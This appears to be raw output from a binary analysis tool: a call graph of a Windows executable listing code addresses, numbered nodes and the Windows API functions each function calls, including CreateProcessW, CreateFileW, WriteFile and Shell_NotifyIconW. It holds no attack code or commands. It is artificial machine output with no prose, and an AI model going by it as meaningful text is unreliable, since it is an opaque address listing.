LeaveCriticalSection 94549->94562 94554 7ff7adc603e1 Concurrency::wait 94550->94554 94564 7ff7adc834e4 77 API calls 3 library calls 94550->94564 94552 7ff7adc5f8f6 94552->94550 94563 7ff7adc81464 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94552->94563 94557 7ff7adc0e1a7 94556->94557 94558 7ff7adc0e1c2 94556->94558 94565 7ff7adc0ee20 5 API calls Concurrency::wait 94557->94565 94560 7ff7adc0e1af 94558->94560 94566 7ff7adc0ee20 5 API calls Concurrency::wait 94558->94566 94560->94549 94562->94552 94564->94554 94565->94560 94566->94560 94567 7ff7adc12c17 94570 7ff7adc114a0 94567->94570 94569 7ff7adc12c2a 94571 7ff7adc114d3 94570->94571 94574 7ff7adc5bdd1 94571->94574 94578 7ff7adc5bdf2 94571->94578 94583 7ff7adc5be31 94571->94583 94601 7ff7adc114fa memcpy_s 94571->94601 94575 7ff7adc5bddb 94574->94575 94574->94601 94635 7ff7adc99514 300 API calls 94575->94635 94577 7ff7adc11884 94627 7ff7adc22130 45 API calls 94577->94627 94586 7ff7adc5be19 94578->94586 94636 7ff7adc99a88 300 API calls 4 library calls 94578->94636 94638 7ff7adc98f48 300 API calls 3 library calls 94583->94638 94585 7ff7adc11898 94585->94569 94637 7ff7adc834e4 77 API calls 3 library calls 94586->94637 94587 7ff7adc24f0c __scrt_initialize_thread_safe_statics 34 API calls 94587->94601 94591 7ff7adc11a30 45 API calls 94591->94601 94594 7ff7adc22130 45 API calls 94594->94601 94595 7ff7adc5bfe4 94641 7ff7adc993a4 77 API calls 94595->94641 94599 7ff7adc0e0a8 4 API calls 94599->94601 94600 7ff7adc11799 94604 7ff7adc11815 94600->94604 94642 7ff7adc834e4 77 API calls 3 library calls 94600->94642 94601->94577 94601->94587 94601->94591 94601->94594 94601->94595 94601->94599 94601->94600 94601->94604 94605 7ff7adc13c20 94601->94605 94626 7ff7adc0ef9c 46 API calls 94601->94626 94628 7ff7adc220d0 45 API calls 94601->94628 94629 7ff7adc05af8 300 API calls 94601->94629 94630 7ff7adc25114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94601->94630 94631 7ff7adc235c8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94601->94631 94632 7ff7adc250b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94601->94632 94633 7ff7adc236c4 77 API calls 94601->94633 94634 7ff7adc237dc 300 API calls 94601->94634 94639 7ff7adc0ee20 5 API calls Concurrency::wait 94601->94639 94640 7ff7adc6ac10 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94601->94640 94604->94569 94624 7ff7adc13c80 94605->94624 94606 7ff7adc605be 94645 7ff7adc834e4 77 API calls 3 library calls 94606->94645 94608 7ff7adc605d1 94608->94601 94610 7ff7adc14aa9 94611 7ff7adc14ac0 94610->94611 94614 7ff7adc0e0a8 4 API calls 94610->94614 94611->94601 94612 7ff7adc14fe7 94616 7ff7adc0e0a8 4 API calls 94612->94616 94613 7ff7adc13dde 94613->94601 94614->94613 94615 7ff7adc5fefe 94619 7ff7adc0e0a8 4 API calls 94615->94619 94616->94613 94617 7ff7adc0e0a8 4 API calls 94617->94624 94618 7ff7adc14a8f 94618->94610 94618->94611 94618->94615 94619->94611 94621 7ff7adc25114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94621->94624 94622 7ff7adc24f0c 34 API calls __scrt_initialize_thread_safe_statics 94622->94624 94623 7ff7adc09640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94623->94624 94624->94606 94624->94610 94624->94612 94624->94613 94624->94617 94624->94618 94624->94621 94624->94622 94624->94623 94625 7ff7adc250b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 94624->94625 94643 7ff7adc15360 300 API calls Concurrency::wait 94624->94643 94644 7ff7adc834e4 77 API calls 3 library calls 94624->94644 94625->94624 94626->94601 94627->94585 94628->94601 94629->94601 94631->94601 94633->94601 94634->94601 94635->94604 94636->94586 94637->94583 94638->94601 94639->94601 94640->94601 94641->94600 94642->94600 94643->94624 94644->94624 94645->94608 94646 7ff7adc12bf8 94649 7ff7adc0ed44 94646->94649 94648 7ff7adc12c05 94650 7ff7adc0edcd 94649->94650 94651 7ff7adc0ed75 94649->94651 94655 7ff7adc0edfe 94650->94655 94659 7ff7adc834e4 77 API calls 3 library calls 94650->94659 94651->94650 94652 7ff7adc13c20 300 API calls 94651->94652 94656 7ff7adc0eda8 94652->94656 94654 7ff7adc5a636 94655->94648 94656->94655 94658 7ff7adc0ee20 5 API calls Concurrency::wait 94656->94658 94658->94650 94659->94654 94660 7ff7adc1447b 94665 7ff7adc158d0 94660->94665 94662 7ff7adc1448a 94695 7ff7adc834e4 77 API calls 3 library calls 94662->94695 94664 7ff7adc60550 94666 7ff7adc158fc 94665->94666 94671 7ff7adc15976 94665->94671 94667 7ff7adc1596d 94666->94667 94668 7ff7adc1622b 94666->94668 94666->94671 94683 7ff7adc15990 94666->94683 94669 7ff7adc15a47 94667->94669 94667->94671 94668->94683 94703 7ff7adc1e65c 36 API calls 94668->94703 94672 7ff7adc16355 94669->94672 94669->94683 94689 7ff7adc1597f 94669->94689 94692 7ff7adc15bd6 94669->94692 94674 7ff7adc16449 94671->94674 94675 7ff7adc61ab5 94671->94675 94686 7ff7adc61aca 94671->94686 94671->94689 94677 7ff7adc16367 94672->94677 94672->94692 94678 7ff7adc0d4cc 48 API calls 94674->94678 94675->94686 94675->94689 94676 7ff7adc61af3 94701 7ff7adc0fd6c 36 API calls 94676->94701 94696 7ff7adc0ef68 36 API calls 94677->94696 94682 7ff7adc16451 94678->94682 94685 7ff7adc0d4cc 48 API calls 94682->94685 94683->94662 94684 7ff7adc1636f 94697 7ff7adc1e65c 36 API calls 94684->94697 94690 7ff7adc1645d 94685->94690 94686->94683 94700 7ff7adc0fd6c 36 API calls 94686->94700 94688 7ff7adc0d4cc 48 API calls 94688->94689 94689->94683 94689->94688 94691 7ff7adc0fd6c 36 API calls 94689->94691 94689->94692 94698 7ff7adc21ad0 CompareStringW 94689->94698 94699 7ff7adc21ad0 CompareStringW 94690->94699 94691->94689 94692->94683 94702 7ff7adc0fd6c 36 API calls 94692->94702 94695->94664 94696->94684 94697->94683 94698->94689 94699->94689 94700->94676 94701->94683 94702->94683 94703->94683 94704 7ff7adc5e263 94705 7ff7adc5e271 94704->94705 94723 7ff7adc12680 94704->94723 94705->94705 94706 7ff7adc129c8 PeekMessageW 94706->94723 94707 7ff7adc126da GetInputState 94707->94706 94707->94723 94709 7ff7adc5d181 TranslateAcceleratorW 94709->94723 94710 7ff7adc12a1f TranslateMessage DispatchMessageW 94711 7ff7adc12a33 PeekMessageW 94710->94711 94711->94723 94712 7ff7adc128b9 timeGetTime 94712->94723 94713 7ff7adc5d2bb timeGetTime 94771 7ff7adc22ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94713->94771 94719 7ff7adc13c20 300 API calls 94719->94723 94720 7ff7adc12856 94721 7ff7adc834e4 77 API calls 94721->94723 94723->94706 94723->94707 94723->94709 94723->94710 94723->94711 94723->94712 94723->94713 94723->94719 94723->94720 94723->94721 94724 7ff7adc12b70 94723->94724 94731 7ff7adc166c0 94723->94731 94765 7ff7adc22de8 94723->94765 94770 7ff7adc12e30 300 API calls 2 library calls 94723->94770 94772 7ff7adc83a28 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94723->94772 94773 7ff7adc9a320 300 API calls Concurrency::wait 94723->94773 94725 7ff7adc12b96 94724->94725 94727 7ff7adc12ba9 94724->94727 94774 7ff7adc12050 94725->94774 94794 7ff7adc834e4 77 API calls 3 library calls 94727->94794 94728 7ff7adc12b9e 94728->94723 94730 7ff7adc5e55c 94737 7ff7adc1673b memcpy_s Concurrency::wait 94731->94737 94733 7ff7adc61fac 94924 7ff7adc9ab30 300 API calls Concurrency::wait 94733->94924 94735 7ff7adc16d40 9 API calls 94735->94737 94736 7ff7adc61fbe 94736->94723 94737->94733 94737->94735 94738 7ff7adc0ec00 4 API calls 94737->94738 94739 7ff7adc16c0f 94737->94739 94744 7ff7adc16c4a 94737->94744 94745 7ff7adc61fc9 94737->94745 94748 7ff7adc24c68 4 API calls 94737->94748 94749 7ff7adc620c1 94737->94749 94750 7ff7adc16c78 94737->94750 94753 7ff7adc13c20 300 API calls 94737->94753 94754 7ff7adc62032 94737->94754 94756 7ff7adc0e0a8 4 API calls 94737->94756 94757 7ff7adc16b15 94737->94757 94800 7ff7adc88ea0 94737->94800 94833 7ff7adc863dc 94737->94833 94838 7ff7adc9f0ac 94737->94838 94841 7ff7adc88e98 94737->94841 94874 7ff7adc9f160 94737->94874 94879 7ff7adc85b80 94737->94879 94885 7ff7adc87e48 94737->94885 94919 7ff7adc25114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94737->94919 94920 7ff7adc250b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94737->94920 94927 7ff7adc98d98 49 API calls Concurrency::wait 94737->94927 94738->94737 94740 7ff7adc16c3d 94739->94740 94739->94745 94921 7ff7adc0ee20 5 API calls Concurrency::wait 94740->94921 94922 7ff7adc21fcc 300 API calls 94744->94922 94925 7ff7adc834e4 77 API calls 3 library calls 94745->94925 94748->94737 94749->94757 94928 7ff7adc834e4 77 API calls 3 library calls 94749->94928 94923 7ff7adc1e8f4 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94750->94923 94753->94737 94926 7ff7adc834e4 77 API calls 3 library calls 94754->94926 94756->94737 94757->94723 94766 7ff7adc22e0d 94765->94766 94768 7ff7adc22e2a 94765->94768 94766->94723 94767 7ff7adc22e5b IsDialogMessageW 94767->94766 94767->94768 94768->94766 94768->94767 94769 7ff7adc69d94 GetClassLongPtrW 94768->94769 94769->94767 94769->94768 94770->94723 94771->94723 94772->94723 94773->94723 94775 7ff7adc13c20 300 API calls 94774->94775 94785 7ff7adc120a8 94775->94785 94776 7ff7adc1212d 94776->94728 94777 7ff7adc5d06f 94799 7ff7adc834e4 77 API calls 3 library calls 94777->94799 94779 7ff7adc5d08d 94780 7ff7adc12552 94781 7ff7adc24c68 4 API calls 94780->94781 94790 7ff7adc123cb memcpy_s 94781->94790 94782 7ff7adc5d036 94797 7ff7adc0ee20 5 API calls Concurrency::wait 94782->94797 94783 7ff7adc24c68 4 API calls 94791 7ff7adc122a5 memcpy_s 94783->94791 94785->94776 94785->94777 94785->94780 94786 7ff7adc12244 94785->94786 94785->94790 94785->94791 94786->94790 94795 7ff7adc11ce4 301 API calls Concurrency::wait 94786->94795 94787 7ff7adc5d062 94798 7ff7adc0ee20 5 API calls Concurrency::wait 94787->94798 94790->94782 94793 7ff7adc834e4 77 API calls 94790->94793 94796 7ff7adc04a60 300 API calls 94790->94796 94791->94783 94791->94790 94793->94790 94794->94730 94795->94791 94796->94790 94797->94787 94798->94777 94799->94779 94801 7ff7adc8a680 94800->94801 94806 7ff7adc8a71a 94801->94806 94947 7ff7adc0834c 94801->94947 94804 7ff7adc0d4cc 48 API calls 94808 7ff7adc8a6d0 94804->94808 94805 7ff7adc8a7fd 94978 7ff7adc81864 6 API calls 94805->94978 94806->94805 94807 7ff7adc8a6f3 94806->94807 94812 7ff7adc8a770 94806->94812 94807->94737 94956 7ff7adc06838 94808->94956 94811 7ff7adc8a805 94979 7ff7adc7b334 94811->94979 94814 7ff7adc0d4cc 48 API calls 94812->94814 94821 7ff7adc8a778 94814->94821 94815 7ff7adc8a6e6 94815->94807 94972 7ff7adc07ab8 94815->94972 94818 7ff7adc8a7ee 94929 7ff7adc7b3a8 94818->94929 94819 7ff7adc8a7a7 94975 7ff7adc098e8 94819->94975 94821->94818 94821->94819 94824 7ff7adc8a7b5 94826 7ff7adc0e0a8 4 API calls 94824->94826 94827 7ff7adc8a7c2 94826->94827 94828 7ff7adc071f8 4 API calls 94827->94828 94830 7ff7adc8a7d3 94828->94830 94829 7ff7adc07ab8 CloseHandle 94829->94807 94831 7ff7adc7b3a8 12 API calls 94830->94831 94832 7ff7adc8a7e0 Concurrency::wait 94831->94832 94832->94807 94982 7ff7adc08314 94832->94982 94834 7ff7adc0d4cc 48 API calls 94833->94834 94835 7ff7adc863f8 94834->94835 95006 7ff7adc7bdec 94835->95006 94837 7ff7adc86404 94837->94737 95014 7ff7adc9f630 94838->95014 94842 7ff7adc8a680 94841->94842 94843 7ff7adc0834c 5 API calls 94842->94843 94847 7ff7adc8a71a 94842->94847 94844 7ff7adc8a6be 94843->94844 94846 7ff7adc0d4cc 48 API calls 94844->94846 94845 7ff7adc8a6f3 94845->94737 94849 7ff7adc8a6d0 94846->94849 94847->94845 94848 7ff7adc8a7fd 94847->94848 94853 7ff7adc8a770 94847->94853 95110 7ff7adc81864 6 API calls 94848->95110 94851 7ff7adc06838 16 API calls 94849->94851 94854 7ff7adc8a6e2 94851->94854 94852 7ff7adc8a805 94857 7ff7adc7b334 4 API calls 94852->94857 94855 7ff7adc0d4cc 48 API calls 94853->94855 94854->94847 94856 7ff7adc8a6e6 94854->94856 94862 7ff7adc8a778 94855->94862 94856->94845 94858 7ff7adc07ab8 CloseHandle 94856->94858 94873 7ff7adc8a7e0 Concurrency::wait 94857->94873 94858->94845 94859 7ff7adc8a7ee 94861 7ff7adc7b3a8 12 API calls 94859->94861 94860 7ff7adc8a7a7 94863 7ff7adc098e8 4 API calls 94860->94863 94861->94873 94862->94859 94862->94860 94865 7ff7adc8a7b5 94863->94865 94864 7ff7adc08314 CloseHandle 94866 7ff7adc8a85c 94864->94866 94867 7ff7adc0e0a8 4 API calls 94865->94867 94866->94845 94870 7ff7adc07ab8 CloseHandle 94866->94870 94868 7ff7adc8a7c2 94867->94868 94869 7ff7adc071f8 4 API calls 94868->94869 94871 7ff7adc8a7d3 94869->94871 94870->94845 94872 7ff7adc7b3a8 12 API calls 94871->94872 94872->94873 94873->94845 94873->94864 94875 7ff7adc9f630 164 API calls 94874->94875 94877 7ff7adc9f182 94875->94877 94876 7ff7adc9f1cd 94876->94737 94877->94876 95111 7ff7adc0ee20 5 API calls Concurrency::wait 94877->95111 94880 7ff7adc85ba5 94879->94880 94881 7ff7adc85be5 FindClose 94880->94881 94882 7ff7adc85bd5 94880->94882 94884 7ff7adc85ba9 94880->94884 94881->94884 94883 7ff7adc07ab8 CloseHandle 94882->94883 94882->94884 94883->94884 94884->94737 94886 7ff7adc87e79 94885->94886 94887 7ff7adc09640 4 API calls 94886->94887 94916 7ff7adc87f55 Concurrency::wait 94886->94916 94888 7ff7adc87ea6 94887->94888 94890 7ff7adc09640 4 API calls 94888->94890 94889 7ff7adc0834c 5 API calls 94891 7ff7adc87f99 94889->94891 94892 7ff7adc87eaf 94890->94892 94893 7ff7adc0d4cc 48 API calls 94891->94893 94894 7ff7adc0d4cc 48 API calls 94892->94894 94895 7ff7adc87fab 94893->94895 94896 7ff7adc87ebe 94894->94896 94897 7ff7adc06838 16 API calls 94895->94897 95112 7ff7adc074ac RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94896->95112 94898 7ff7adc87fba 94897->94898 94900 7ff7adc87fbe GetLastError 94898->94900 94905 7ff7adc87ff5 94898->94905 94902 7ff7adc87fd8 94900->94902 94901 7ff7adc87ed8 95113 7ff7adc07c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94901->95113 94908 7ff7adc07ab8 CloseHandle 94902->94908 94912 7ff7adc87fe5 94902->94912 94904 7ff7adc87f07 94904->94916 95114 7ff7adc7bdd4 lstrlenW GetFileAttributesW FindFirstFileW FindClose 94904->95114 94906 7ff7adc09640 4 API calls 94905->94906 94909 7ff7adc88035 94906->94909 94908->94912 94909->94912 95116 7ff7adc70d38 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94909->95116 94910 7ff7adc87f17 94911 7ff7adc87f1b 94910->94911 94910->94916 94914 7ff7adc0ec00 4 API calls 94911->94914 94912->94737 94915 7ff7adc87f28 94914->94915 95115 7ff7adc7bab8 8 API calls Concurrency::wait 94915->95115 94916->94889 94916->94912 94918 7ff7adc87f31 Concurrency::wait 94918->94916 94921->94744 94922->94750 94923->94750 94924->94736 94925->94757 94926->94757 94927->94737 94928->94757 94930 7ff7adc7b42a 94929->94930 94931 7ff7adc7b3c8 94929->94931 94934 7ff7adc7b334 4 API calls 94930->94934 94932 7ff7adc7b41e 94931->94932 94933 7ff7adc7b3d0 94931->94933 94992 7ff7adc7b458 8 API calls 94932->94992 94936 7ff7adc7b3dd 94933->94936 94937 7ff7adc7b3f1 94933->94937 94946 7ff7adc7b410 Concurrency::wait 94934->94946 94988 7ff7adc0a368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94936->94988 94990 7ff7adc0a368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94937->94990 94940 7ff7adc7b3f6 94991 7ff7adc7b270 6 API calls 94940->94991 94941 7ff7adc7b3e2 94989 7ff7adc24120 6 API calls 94941->94989 94944 7ff7adc7b3ef 94985 7ff7adc7b384 94944->94985 94946->94832 94948 7ff7adc24c68 4 API calls 94947->94948 94949 7ff7adc08363 94948->94949 94950 7ff7adc08314 CloseHandle 94949->94950 94951 7ff7adc0836f 94950->94951 94952 7ff7adc09640 4 API calls 94951->94952 94953 7ff7adc08378 94952->94953 94954 7ff7adc08314 CloseHandle 94953->94954 94955 7ff7adc08380 94954->94955 94955->94804 94957 7ff7adc08314 CloseHandle 94956->94957 94958 7ff7adc0685a 94957->94958 94959 7ff7adc4caa8 94958->94959 94960 7ff7adc0687d CreateFileW 94958->94960 94961 7ff7adc4caae CreateFileW 94959->94961 94971 7ff7adc068d9 94959->94971 94965 7ff7adc068ab 94960->94965 94962 7ff7adc4cae6 94961->94962 94961->94965 94995 7ff7adc06a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 94962->94995 94964 7ff7adc4caf3 94964->94965 94968 7ff7adc068e4 94965->94968 94993 7ff7adc068f4 9 API calls 94965->94993 94967 7ff7adc068c1 94967->94971 94994 7ff7adc06a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 94967->94994 94968->94806 94968->94815 94969 7ff7adc7b334 4 API calls 94969->94968 94971->94968 94971->94969 94996 7ff7adc082e4 94972->94996 94976 7ff7adc24c68 4 API calls 94975->94976 94977 7ff7adc09918 94976->94977 94977->94824 94978->94811 95001 7ff7adc7b188 94979->95001 94983 7ff7adc0832a 94982->94983 94984 7ff7adc0833d CloseHandle 94982->94984 94983->94807 94983->94829 94984->94983 94986 7ff7adc7b334 4 API calls 94985->94986 94987 7ff7adc7b399 94986->94987 94987->94946 94988->94941 94989->94944 94990->94940 94991->94944 94992->94946 94993->94967 94994->94971 94995->94964 94997 7ff7adc08314 CloseHandle 94996->94997 94998 7ff7adc082f2 Concurrency::wait 94997->94998 94999 7ff7adc08314 CloseHandle 94998->94999 95000 7ff7adc08303 94999->95000 95002 7ff7adc7b19c WriteFile 95001->95002 95003 7ff7adc7b193 95001->95003 95002->94832 95005 7ff7adc7b208 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95003->95005 95005->95002 95009 7ff7adc7c7c0 lstrlenW 95006->95009 95010 7ff7adc7c7dd GetFileAttributesW 95009->95010 95012 7ff7adc7bdf5 95009->95012 95011 7ff7adc7c7eb FindFirstFileW 95010->95011 95010->95012 95011->95012 95013 7ff7adc7c7ff FindClose 95011->95013 95012->94837 95013->95012 95016 7ff7adc9f671 memcpy_s 95014->95016 95015 7ff7adc0d4cc 48 API calls 95017 7ff7adc9f74d 95015->95017 95016->95015 95082 7ff7adc0e330 95017->95082 95019 7ff7adc9f759 95020 7ff7adc9f840 95019->95020 95021 7ff7adc9f762 95019->95021 95022 7ff7adc9f87d GetCurrentDirectoryW 95020->95022 95024 7ff7adc0d4cc 48 API calls 95020->95024 95023 7ff7adc0d4cc 48 API calls 95021->95023 95025 7ff7adc24c68 4 API calls 95022->95025 95026 7ff7adc9f777 95023->95026 95027 7ff7adc9f85c 95024->95027 95028 7ff7adc9f8a7 GetCurrentDirectoryW 95025->95028 95029 7ff7adc0e330 4 API calls 95026->95029 95030 7ff7adc0e330 4 API calls 95027->95030 95031 7ff7adc9f8b5 95028->95031 95032 7ff7adc9f783 95029->95032 95033 7ff7adc9f868 95030->95033 95034 7ff7adc9f8f0 95031->95034 95095 7ff7adc1f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95031->95095 95035 7ff7adc0d4cc 48 API calls 95032->95035 95033->95022 95033->95034 95040 7ff7adc9f905 95034->95040 95045 7ff7adc9f901 95034->95045 95037 7ff7adc9f798 95035->95037 95039 7ff7adc0e330 4 API calls 95037->95039 95038 7ff7adc9f8d0 95096 7ff7adc1f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95038->95096 95042 7ff7adc9f7a4 95039->95042 95098 7ff7adc7fddc 8 API calls 95040->95098 95044 7ff7adc0d4cc 48 API calls 95042->95044 95043 7ff7adc9f8e0 95097 7ff7adc1f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95043->95097 95048 7ff7adc9f7b9 95044->95048 95050 7ff7adc9fa0f CreateProcessW 95045->95050 95051 7ff7adc9f972 95045->95051 95053 7ff7adc0e330 4 API calls 95048->95053 95049 7ff7adc9f90e 95099 7ff7adc7fca8 8 API calls 95049->95099 95079 7ff7adc9f9b4 95050->95079 95101 7ff7adc6d1f8 99 API calls 95051->95101 95055 7ff7adc9f7c5 95053->95055 95057 7ff7adc9f806 GetSystemDirectoryW 95055->95057 95059 7ff7adc0d4cc 48 API calls 95055->95059 95056 7ff7adc9f926 95100 7ff7adc7fafc 8 API calls ~SyncLockT 95056->95100 95061 7ff7adc24c68 4 API calls 95057->95061 95062 7ff7adc9f7e1 95059->95062 95060 7ff7adc9f94f 95060->95045 95063 7ff7adc9f830 GetSystemDirectoryW 95061->95063 95065 7ff7adc0e330 4 API calls 95062->95065 95063->95031 95064 7ff7adc9fabe CloseHandle 95067 7ff7adc9faf5 95064->95067 95068 7ff7adc9facc 95064->95068 95066 7ff7adc9f7ed 95065->95066 95066->95031 95066->95057 95069 7ff7adc9fafe 95067->95069 95074 7ff7adc9fb26 CloseHandle 95067->95074 95102 7ff7adc7f7dc 95068->95102 95078 7ff7adc9faa3 95069->95078 95072 7ff7adc9fa64 95075 7ff7adc9fa84 GetLastError 95072->95075 95074->95078 95075->95078 95086 7ff7adc7f51c 95078->95086 95079->95064 95079->95072 95083 7ff7adc0e342 95082->95083 95084 7ff7adc24c68 4 API calls 95083->95084 95085 7ff7adc0e361 wcscpy 95084->95085 95085->95019 95087 7ff7adc7f7dc CloseHandle 95086->95087 95088 7ff7adc7f52a 95087->95088 95107 7ff7adc7f7b8 95088->95107 95091 7ff7adc7f7b8 ~SyncLockT CloseHandle 95092 7ff7adc7f53c 95091->95092 95093 7ff7adc7f7b8 ~SyncLockT CloseHandle 95092->95093 95094 7ff7adc7f545 95093->95094 95094->94737 95095->95038 95096->95043 95097->95034 95098->95049 95099->95056 95100->95060 95101->95079 95103 7ff7adc7f7b8 ~SyncLockT CloseHandle 95102->95103 95104 7ff7adc7f7ee 95103->95104 95105 7ff7adc7f7b8 ~SyncLockT CloseHandle 95104->95105 95106 7ff7adc7f7f7 95105->95106 95108 7ff7adc7f7c9 CloseHandle 95107->95108 95109 7ff7adc7f533 95107->95109 95108->95109 95109->95091 95110->94852 95111->94876 95112->94901 95113->94904 95114->94910 95115->94918 95116->94912 95117 7ff7adc05dec 95118 7ff7adc05df4 95117->95118 95119 7ff7adc05e98 95118->95119 95120 7ff7adc05e28 95118->95120 95158 7ff7adc05e96 95118->95158 95122 7ff7adc4c229 95119->95122 95123 7ff7adc05e9e 95119->95123 95124 7ff7adc05e35 95120->95124 95125 7ff7adc05f21 PostQuitMessage 95120->95125 95121 7ff7adc05e6b DefWindowProcW 95155 7ff7adc05e7c 95121->95155 95173 7ff7adc1ede4 8 API calls 95122->95173 95126 7ff7adc05ea5 95123->95126 95127 7ff7adc05ecc SetTimer RegisterWindowMessageW 95123->95127 95128 7ff7adc05e40 95124->95128 95129 7ff7adc4c2af 95124->95129 95125->95155 95131 7ff7adc4c1b8 95126->95131 95132 7ff7adc05eae KillTimer 95126->95132 95133 7ff7adc05efc CreatePopupMenu 95127->95133 95127->95155 95134 7ff7adc05f2b 95128->95134 95135 7ff7adc05e49 95128->95135 95185 7ff7adc7a40c 16 API calls memcpy_s 95129->95185 95139 7ff7adc4c1bd 95131->95139 95140 7ff7adc4c1f7 MoveWindow 95131->95140 95159 7ff7adc05d88 95132->95159 95133->95155 95163 7ff7adc24610 95134->95163 95147 7ff7adc05f0b 95135->95147 95148 7ff7adc05e5f 95135->95148 95135->95158 95137 7ff7adc4c255 95174 7ff7adc22c44 47 API calls Concurrency::wait 95137->95174 95144 7ff7adc4c1e4 SetFocus 95139->95144 95145 7ff7adc4c1c2 95139->95145 95140->95155 95142 7ff7adc4c2c3 95142->95121 95142->95155 95144->95155 95145->95148 95149 7ff7adc4c1cb 95145->95149 95171 7ff7adc05f3c 26 API calls memcpy_s 95147->95171 95148->95121 95154 7ff7adc05d88 Shell_NotifyIconW 95148->95154 95172 7ff7adc1ede4 8 API calls 95149->95172 95153 7ff7adc05f1f 95153->95155 95156 7ff7adc4c280 95154->95156 95175 7ff7adc06258 95156->95175 95158->95121 95160 7ff7adc05de4 95159->95160 95161 7ff7adc05d99 memcpy_s 95159->95161 95170 7ff7adc07098 DeleteObject DestroyWindow Concurrency::wait 95160->95170 95162 7ff7adc05db8 Shell_NotifyIconW 95161->95162 95162->95160 95164 7ff7adc2461a memcpy_s 95163->95164 95165 7ff7adc246db 95163->95165 95186 7ff7adc072c8 95164->95186 95165->95155 95167 7ff7adc246a2 KillTimer SetTimer 95167->95165 95168 7ff7adc24660 95168->95167 95169 7ff7adc6aaa1 Shell_NotifyIconW 95168->95169 95169->95167 95170->95155 95171->95153 95172->95155 95173->95137 95174->95148 95176 7ff7adc06287 memcpy_s 95175->95176 95210 7ff7adc061c4 95176->95210 95179 7ff7adc0632d 95181 7ff7adc0634e Shell_NotifyIconW 95179->95181 95182 7ff7adc4c644 Shell_NotifyIconW 95179->95182 95183 7ff7adc072c8 6 API calls 95181->95183 95184 7ff7adc06365 95183->95184 95184->95158 95185->95142 95187 7ff7adc072f4 95186->95187 95188 7ff7adc073bc Concurrency::wait 95186->95188 95189 7ff7adc098e8 4 API calls 95187->95189 95188->95168 95190 7ff7adc07303 95189->95190 95191 7ff7adc4cdfc LoadStringW 95190->95191 95192 7ff7adc07310 95190->95192 95194 7ff7adc4ce1e 95191->95194 95193 7ff7adc07cf4 4 API calls 95192->95193 95195 7ff7adc07324 95193->95195 95196 7ff7adc0e0a8 4 API calls 95194->95196 95197 7ff7adc07336 95195->95197 95198 7ff7adc4ce30 95195->95198 95204 7ff7adc0734f memcpy_s wcscpy 95196->95204 95197->95194 95199 7ff7adc07343 95197->95199 95209 7ff7adc07c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 95198->95209 95208 7ff7adc07c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 95199->95208 95202 7ff7adc4ce3c 95203 7ff7adc071f8 4 API calls 95202->95203 95202->95204 95205 7ff7adc4ce63 95203->95205 95206 7ff7adc073a3 Shell_NotifyIconW 95204->95206 95207 7ff7adc071f8 4 API calls 95205->95207 95206->95188 95207->95204 95208->95204 95209->95202 95211 7ff7adc4c5f8 95210->95211 95212 7ff7adc061e0 95210->95212 95211->95212 95213 7ff7adc4c602 DestroyIcon 95211->95213 95212->95179 95214 7ff7adc7ad94 39 API calls wcsftime 95212->95214 95213->95212 95214->95179 95215 7ff7adc147e1 95216 7ff7adc14d57 95215->95216 95220 7ff7adc147f2 95215->95220 95246 7ff7adc0ee20 5 API calls Concurrency::wait 95216->95246 95218 7ff7adc14d66 95247 7ff7adc0ee20 5 API calls Concurrency::wait 95218->95247 95220->95218 95221 7ff7adc14862 95220->95221 95222 7ff7adc14df3 95220->95222 95224 7ff7adc166c0 300 API calls 95221->95224 95244 7ff7adc13c80 95221->95244 95248 7ff7adc80978 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95222->95248 95224->95244 95225 7ff7adc13dde 95226 7ff7adc605be 95250 7ff7adc834e4 77 API calls 3 library calls 95226->95250 95228 7ff7adc605d1 95230 7ff7adc14ac0 95231 7ff7adc14fe7 95234 7ff7adc0e0a8 4 API calls 95231->95234 95232 7ff7adc0e0a8 4 API calls 95232->95225 95233 7ff7adc5fefe 95238 7ff7adc0e0a8 4 API calls 95233->95238 95234->95225 95235 7ff7adc250b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 95235->95244 95236 7ff7adc0e0a8 4 API calls 95236->95244 95237 7ff7adc14a8f 95237->95230 95237->95233 95239 7ff7adc14aa9 95237->95239 95238->95230 95239->95230 95239->95232 95241 7ff7adc25114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95241->95244 95242 7ff7adc24f0c 34 API calls __scrt_initialize_thread_safe_statics 95242->95244 95243 7ff7adc09640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95243->95244 95244->95225 95244->95226 95244->95231 95244->95235 95244->95236 95244->95237 